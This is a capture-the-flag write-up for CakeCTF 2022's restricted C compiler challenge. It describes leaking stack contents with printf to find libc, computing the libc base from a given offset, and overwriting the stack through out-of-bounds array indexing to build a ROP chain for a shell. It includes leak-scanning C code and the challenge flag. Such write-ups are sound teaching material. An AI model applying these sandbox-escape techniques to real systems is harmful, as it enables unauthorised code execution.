0x0 Introduction
I designed a restricted C compiler! nc misc.2022.cakectf.com 10099
files: c_sandbox_c85cfad2fce8c0c6ac1dc144a1e4229c.tar.gz
0x1 Walk through
Basically, the server compiles a C program and executes it, but it only allows 4 functions to be called.
sandbox.cpp
/* Allow these function calls */
Our goal is to get a shell under this restriction.
My first approach was to use asm in the C code. However, the sandbox also detects it and prevents me from executing asm code.
Then I tried my second solution: constructing a ROP chain.
Since we can use printf/puts in our code, we can simply print out the whole stack and find the libc address. Moreover, the challenge also provides us a Dockerfile, so we can easily extract libc from it and get the offsets of the libc functions.
printf(
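The leak step described above, as an added example that is not the author's solve code: it scans a dump of stack words for the saved return address into libc and derives the libc base from it. The helper name and the dump values are constructed for illustration, and an x86-64 Linux layout is assumed; only the offset 0x24083 comes from this writeup.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/* Offset of the return address inside libc, as given in this writeup. */
#define LIBC_START_MAIN_RET 0x24083ULL
#define PAGE_LOW_BITS       0xfffULL

/* Constructed sample: six words as they might be printed from the stack. */
static const uint64_t sample_dump[] = {
    0x0000000000000000ULL,
    0x00007ffe3c1a9b10ULL, /* stack pointer */
    0x0000555555555083ULL, /* decoy: program text, same low 12 bits */
    0x0000000000000001ULL,
    0x00007f3a1c7e5083ULL, /* saved return address into libc */
    0x00007ffe3c1a9c08ULL,
};

/* Hypothetical helper: returns the index of the first word that looks like
 * the libc return address and stores the implied base in *base, or -1. */
static int find_libc_ret(const uint64_t *words, size_t n, uint64_t *base)
{
    for (size_t i = 0; i < n; i++) {
        uint64_t w = words[i];
        /* ASLR shifts mappings by whole pages, so the low 12 bits survive. */
        if ((w & PAGE_LOW_BITS) != (LIBC_START_MAIN_RET & PAGE_LOW_BITS))
            continue;
        /* Assumption: shared libraries are mapped at 0x7f.. addresses.
         * Stack addresses share this prefix, so confirm a hit by hand. */
        if ((w >> 40) != 0x7f)
            continue;
        *base = w - LIBC_START_MAIN_RET; /* page-aligned by construction */
        return (int)i;
    }
    return -1;
}

int main(void)
{
    uint64_t base = 0;
    size_t n = sizeof sample_dump / sizeof sample_dump[0];
    int idx = find_libc_ret(sample_dump, n, &base);
    printf("index %d, libc base 0x%llx\n", idx, (unsigned long long)base);
    return 0;
}
```

One leaked return address fixes the position of the whole library, which is why an allowlist of callable functions does not contain code that can still read memory out of bounds.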
Modifying the stack in C is very straightforward: just create a long array and modify the stack values by index.
long x[1];
0x2 Solution
long __libc_start_main_ret = 0x24083;
0x3 Flag & Thoughts
It is actually more like a pwn problem.
CakeCTF{briI1ng_yoO0ur_oO0wn_gaA4dgeE3t!}